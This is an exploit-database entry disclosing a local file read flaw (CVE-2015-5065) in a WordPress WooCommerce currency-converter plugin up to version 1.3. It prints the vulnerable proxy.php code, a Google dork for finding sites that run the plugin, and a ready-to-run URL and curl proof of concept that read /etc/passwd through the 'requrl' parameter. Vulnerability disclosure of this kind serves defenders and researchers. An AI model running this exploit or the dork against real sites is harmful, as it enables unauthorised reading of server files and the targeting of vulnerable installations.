# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read # Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce" # Date: 10/06/2015 # Exploit Author: Kuroi'SH # Software Link: https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/ # Version: <=1.3 # Tested on: Linux Description: proxy.php's code: <?php $file = file_get_contents($_GET['requrl']); $left=strpos($file,'<div id=currency_converter_result>'); $right=strlen($file)-strpos($file,'<input type=hidden name=meta'); $snip= substr($file,$left,$right); echo $snip; ?> Based on user input, the content of a file is printed out (unfortunately not included) so any html file can be loaded, and an attacker may be able to read any local file which is not executed in the server. Example: http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd POC: curl --silent --url http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
Related Exploits
Trying to match CVEs (1): CVE-2015-5065Trying to match OSVDBs (1): 123187
Trying to match setup file: c0cdc8c17d88b55a4b41f30e7109b36b
Other Possible E-DB Search Terms: WordPress Plugin Paypal Currency Converter Basic For WooCommerce
Date | D | V | Title | Author | No matches |
---|